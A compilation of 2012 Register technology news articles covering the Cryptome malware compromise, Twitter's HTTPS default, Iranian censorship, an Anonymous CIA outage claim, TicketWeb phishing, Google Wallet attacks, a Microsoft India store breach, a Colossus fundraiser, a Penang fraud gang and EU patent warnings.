STE WILLIAMS

Cybercrooks have planted malicious scripts on top of whistle-blowing nerve centre Cryptome.org.

The website this morning…

The attack, which used the well-known Blackhole toolkit, exposed surfers visiting any page of Cryptome.org to a hacker-controlled page that leveraged browser exploits and the like to compromise readers’ machines.

The methods used to breach Cryptome and plant malicious code remain unclear as of Tuesday morning. There are several possible routes to compromise a system, from SQL injections to exploiting a flaw in an public-facing server. It’s unclear who carried out the attack or their motives, which might be just to infect machines and plant Trojans as part of a money-making scam or something more targeted against Cryptome’s user base.

Cryptome specialises in publishing information about cryptography, surveillance, freedom of speech and related issues. The site has a similar profile to WikiLeaks in some ways, but has been operating for far longer, since 1996.

The whistle-blowing site confirmed the hack and published a notice on its site on Tuesday saying that a “complete restoration of Cryptome with clean files is underway”. The restoration process is expected to take around a day. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/14/cryptome_hacked/

Twitter has finally bedded down secure browsing on its site for all users after previously offering HTTPS as an optional feature.

In March last year it debuted the opt-in setting that enabled Secure Sockets Layer encryption, but explained at the time that the option would not be switched on by default.

The secure-browsing option also failed to be extended to users accessing Twitter via their mobile phones. A temporary work around was offered by the company, which involved users having to tap in the address https://mobile.twitter.com.

It’s fair to surmise from all that fiddling that only canny or overly cautious types probably actually switched SSL on for Twitter, or were wise enough to use the site via the HTTPS address provided for mobile phones.

Others might wonder what took the company so long.

Twitter posted a brief statement on its blog explaining the switcheroo.

Last year, we added the option to always use HTTPS when accessing Twitter.com on the web. This setting makes your Twitter experience more secure by protecting your information, and it’s especially helpful if you use Twitter over an unsecured Internet connection like a public WiFi network.

Now, HTTPS will be on by default for all users, whenever you sign in to Twitter.com. If you prefer not use it, you can turn it off on your Account Settings page. HTTPS is one of the best ways to keep your account safe and it will only get better as we continue to improve HTTPS support on our web and mobile clients.

Last week, social-networking-for-suits outfit LinkedIn confirmed it too was finally offering SSL to its users. It said that for now the option would not be switched on by default for all users of that site. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/14/twitter_ssl_now_set_to_default/

Iranians have a little more Internet access than a few days ago, but access is still highly restricted.

Last week, the country imposed a block on SSL-based VPNs which, it seems, is still in place. Barring SSL/TLS traffic stopped Iranians from using the well-known TOR Project to bypass state censorship of Internet sites. In addition, Iranians found themselves unable to access Web-based mail sites like Gmail, Yahoo! Mail and Hotmail, along with a host of other popular services.

The Washington Post is now reporting that the blocks on e-mail services seem to be easing, although access remains blocked to Facebook and Twitter.

Users running into the officially-denied blocks either wait an eternity for sites to load, or receive a block-page attributing their lack of access to “computer crime regulations”.

The blocks are attributed to upcoming elections and the anniversary of its 1979 revolution.

With the country tightening its grip on what users are able to access online, there’s a growing speculation that the country’s so-called “Halal Internet” is imminent. Last April, the country’s head of economic affairs Ali Aqamohammadi told state newsagency IRNA that Iran plans this parallel Internet to counter “American dominance” over the Internet.

Iran has never explained in detail how such a project would operate. An alternate DNS root system creates a walled garden of sorts, but only if users don’t (or cannot) reach the rest of the world’s domains. A national-scale NAT firewall, on the other hand, is difficult to scale – as, arguably, Iran is discovering in its current efforts at censorship.

A member of Iran’s filtering committee, Mohammad Sadegh Afrasiabi, is reported by AFP as telling newspaper Hamshahri that the Iranian “national Internet” is four years away from implementation and won’t involve blocking e-mail. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/email_back_in_iran_for_now/

Loosely connected hacking collective Anonymous claimed responsibility for making the CIA’s website inaccessible on Friday – but later said it was just reporting the event.

The apparent distributed denial of service attack against the spy agency’s web presence follows a week after the release of a recording of a conference call between the FBI and British law enforcement officials discussing the progress of various cases against alleged members of Anonymous and LulzSec.

A Twitter account associated with the activists’ movement claimed credit for the takedown before backtracking and saying it was merely “noting” that the cia.gov site was inaccessible.

The initial statement “#Anonymous takes down main CIA website cia.gov; site is still down | goo.gl/UL2ij” was followed by “We’d remind media that if we report a hack or ddos attack, it doesn’t necessarily mean we did it… FYI” from the same YouAnonNews Twitter account a day later.

The conflicting statements have created a certain amount of confusion about who was responsible for the outage.

A CIA representative confirmed problems with the agency’s website without commenting on the reasons for the downtime, saying: “We are aware of the problems accessing our Web site, and are working to resolve them.”

The cia.gov site returned to normal operation on Saturday. The site (which essentially serves as an online brochure for the spy agency and an outlet for public relations material) has been the target of hacktivists in the past, including a June 2011 attack by LulzSec.

Other elements of Anonymous launched attacks against the Mexican Senate and Interior Ministry websites, in a protest against proposed Mexican anti-piracy laws that hacktivists compared to the SOPA legislation north of the border.

And in a further attack against US law enforcement, other hacktivists posted (partially redacted) information swiped from police and government servers in Alabama.

Hackers claimed they had obtained highly sensitive personal information on 46,000 Alabama residents, including names, Social Security numbers, dates of birth, criminal records, and license plate numbers from insecure state government servers. A censored version of a sample of the hacked data was uploaded to PasteBin.

Anonymous said the hack was in protest against controversial Alabama state immigration laws. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/cia_website_outage/

Customers of UK ticketing agency TicketWeb, a subsidiary of TicketMaster, received phishing emails from the company over the weekend after its direct email marketing system was hacked.

Users received an email that told them their current version of Adobe Acrobat Reader was out of date, and asked them to upgrade to the 2012 version. Within the email was a link to the upgrade that took them to a third-party website where they were asked for personal information, including their card details.

“On Saturday February 11, some of our customers received up to four unauthorised emails,” a TicketWeb spokesperson told The Register.

“These emails contained a link that customers may have followed and subsequently entered information into a third party website.

“Customers who may have entered card details upon following the link have been advised to contact their card issuer immediately for advice in respect of the best course of action to take in their particular circumstances.”

After the spam mails were sent out, TicketWeb emailed its customers with an urgent message warning them about the security breach and advising them that the emails were unauthorised.

The ticketing firm said that it had “taken immediate action to close the vulnerability”.

“No sensitive personal information or credit card information was vulnerable directly from the TicketWeb UK direct email marketing system during this incident,” the spokesperson said.

“We sincerely regret any concern that may have been caused. TicketWeb UK takes the security of customer data very seriously and will be liaising with the Information Commissioner’s Office in relation to this unauthorised system access.”

The firm said it couldn’t provide any more information at this stage about what sort of vulnerability had been exploited.

TicketWeb sells tickets to all sorts of events in the UK, including gigs, theatre performances, comedy clubs, festivals and nightclubs. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/ticketweb_email_lists_hacked/

Google has suspended the provisioning of pre-paid cards into its electronic wallet, preventing the use of stolen cards but equally preventing new customers from signing up.

Two recent attacks have been made on Google’s Wallet, which protects cards used to authorise NFC transactions made by bonking a phone into a payment point. The suspension of provisioning deals with the problem of the latter, more trivial, attack, while Google makes a technical fix – but fixing customer confidence will be much more of a challenge.

The first attack, which remains possible, can only be launched on a phone which has been rooted and requires installation (and development) of some specialist software. That attack discoverers the user’s existing PIN, and once this is known the attacker can make payments and view the transaction history of the user – though the attacker cannot see the details of the cards on the phones (which are not displayed on-screen as we erroneously reported last week).

The latter attack requires physical access to the phone, but it is trivial and can be accomplished within a few seconds if the handset isn’t protected with screen lock. Just deleting the Wallet application data makes it ask for a replacement PIN as though running it for the first time, but it also makes a provisioning request to Google before it opens – so by halting provisioning Google has blocked that process.

Both attacks allow the miscreant to make payments using the credit stored on the phone, at least until the account is cancelled, making an electronic wallet almost as insecure as a physical one. The electronic version still won’t reveal the card details, and can be remotely cancelled as well as tracked (if appropriate software is installed), so it is still much more secure than a the traditional leather package, but that’s not how the public sees it.

New technology is always scary, and people have been carrying wallets for a long time. A lost wallet is a known quantity, and the familiarity makes it less scary. Most stolen wallets are taken for the cash they contain, and then discarded; electronic wallets may well prove similar.

NFC World reckons that Google rushed its Wallet out, with the intention of fixing it later, and lists several outstanding questions about how transfer to balances and repeated installations will be handled. None of the attacks have targeted the NFC payment process itself, instead revealing flaws in the way users manage the Wallet, which lies outside the NFC standard.

The problem for the industry is the undermining of public confidence in the whole idea of proximity payments. Once undermined, that confidence is very hard to rebuild – and one has to wonder if Google is the ideal company to handle that rebuilding. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/google_wallet_lock/

Microsoft appears to have had its Indian web store broken into and user login credentials stolen by Chinese hackers.

Tech site WP Sauce reported on Sunday that the group, which goes by the name Evil Shadow Team, managed to deface the web site, posting an image of a V for Vendetta mask and the message: “Unsafe system will be baptized.”

At the time of writing the site had been taken offline, presumably while Quasar Media, the third-party digital media firm Microsoft employed to run it, figures out what went wrong.

“The Microsoft Store India is currently unavailable. Microsoft is working to restore access as quickly as possible. We apologise for any inconvenience this may have caused,” the holding page message reads.

According to multiple reports, punters’ logins and passwords were also stolen by the hackers, a situation made significantly worse because Quasar apparently made the schoolboy error of storing them in plain text.

Not much is known about Evil Shadow Team, although a link posted on the defaced Microsoft Store page on Sunday takes the user to the group’s blog, written in Chinese and titled “7z1’s blog”.

Users of Microsoft Store in India have been advised to change their passwords on the site as soon as it comes back online, and to change their credentials on any other sites if they used the same ones across multiple online accounts.

Microsoft has yet to respond to a request for comment. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/13/microsoft_india_web_store_hack/

The National Museum of Computing (TNMOC) has turned to a tried-and-tested fundraising method to establish a home for the rebuilt Colossus computer at Bletchley Park.

Individuals and firms are invited to buy up pixels of an online picture of the wartime code-breaking machine – at 10 pence per dot with a minimum spend of £10 – pretty much like Alex Tew’s million-dollar homepage effort.

The museum’s curators need the cash to open an exhibition featuring the Colossus in the historic Block H, on the spot where Colossus No 9 stood during the Second World War and where the rebuild took place.

Colossus was the world’s first electronic programmable computer, and was used to crack encrypted messages between Hitler and his generals.

Housing the rebuild in the same location as its wartime predecessor will be “a fitting tribute to the wartime code-breakers and an inspiration to future generations of computer scientists and engineers”, according to the museum.

Details of how to sponsor a valve on the virtual Colossus can be found here. Payment is collected by PayPal. The National Museum of Computing hopes to raise £150,000 via the scheme.

More information on the Colossus rebuild project, which was led by engineer Tony Sale, can be found here. Details of the technology were kept secret until 1975. The rebuild project started in the 1990s and took more than ten years.

Tim Reynolds, acting chairman of TNMOC, said: “Tony Sale’s tribute to the wartime code-breakers is awe-inspiring and we are seeking resources to present the rebuilt Colossus so that generations to come will be able to understand its significance. The death of Tony Sale last year was a tragic loss to us all, but fortunately he had already started to plan the new gallery with a TNMOC team.

“TNMOC, an independent charity, has received no lottery funding and must pay substantial rent and other overheads. Despite this and working with very modest budgets, we have opened two major new galleries – featuring the Tunny machine and BBC Domesday Touchtable – over the past nine months and have two more including Colossus planned for 2012. We therefore welcome all contributions from individuals and company sponsors to help us present a gallery that will do justice to Colossus and enthral visitors for years to come.”

The Colossus room will be closed from early March for the construction of a new gallery, which will house “exciting interactive and informative displays” as well as, hopefully, the rebuilt Colossus. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/10/bletchley_park_colossus/

The suspected ringleader of an internet and telephone fraud gang based in Penang, Malaysia, has been nabbed by police after being lured to Taiwan by his former gang-mates, it has emerged.

A Taiwanese man known as Huang was reportedly arrested at Taoyuan International Airport near Taipei as he re-entered the country at the end of January, two weeks after over 30 of his alleged gang mates were nicked during Penang raids earlier that month.

Taiwanese police are said to have used 10 members of the gang arrested in the earlier raids to persuade Huang to come back to the country.

The gang, which reportedly comprised Taiwanese, Malaysian and Chinese nationals and was nicknamed the “Macau Cheats”, may have coined in as much as NT$400m (£8.6m) in nearly two years.

Members of the gang were recruited though newspaper and internet ads offering to pay large sums for telephone sales staff based in Malaysia.

However, the actual role entailed them cold-calling mainly Chinese nationals, pretending to be bank workers, police officers and other officials and persuading the victim to transfer funds to accounts owned by the fraudsters.

Separately, local news has reported that Penang police have seized over 1,000 computerised gambling machines already this year in an attempt to crack a large-scale syndicate operating illegal gambling premises disguised as cyber cafes.

According to the New Straights Times, such operations remain widespread despite a concerted police crackdown because of the large sums on offer. Gambling ringleaders can expect to make upwards of £370,000 a year, the reports suggested. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/10/penang_fraud_arrested_taiwan/

European anti-competition chief Joaquin Almunia has warned that the EU won’t stand for any messing about with technology standards-related patents.

Almunia, giving a speech today at the Concurrences conference in Paris, said that he was prepared to use the EU’s enforcement measures, such as fines of up to 10 per cent of a biz’s global turnover, to make his point.

“Standardisation processes must be fair and transparent, so that they are not in the hands of established firms willing to impose their technologies. But it is not enough. We must also ensure that, once they hold standard essential patents, companies give effective access on fair, reasonable and non-discriminatory terms,” Almunia said.

“I am determined to use antitrust enforcement to prevent the misuse of patent rights to the detriment of a vigorous and accessible market. I have initiated investigations on this issue in several sectors and we will see the results in due time.”

The EU has already announced a formal investigation of Samsung for misuse of essential patents in its European battles with Apple over smartphones and fondleslabs.

In the last few months, Google, Apple and Microsoft have all given promises to behave when it comes to standards patents, though they all seem to have left themselves a little wiggle-room.

Essential patents relate to industry standards, such as 3G for mobiles. They’re supposed to be open to everyone to license relatively easily and cheaply so that new businesses can have a chance to enter the market.

“It is a major task of competition control to ensure that new generations of businesses are given a fair chance,” Almunia said in his speech. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/02/10/eu_chief_warns_on_patents/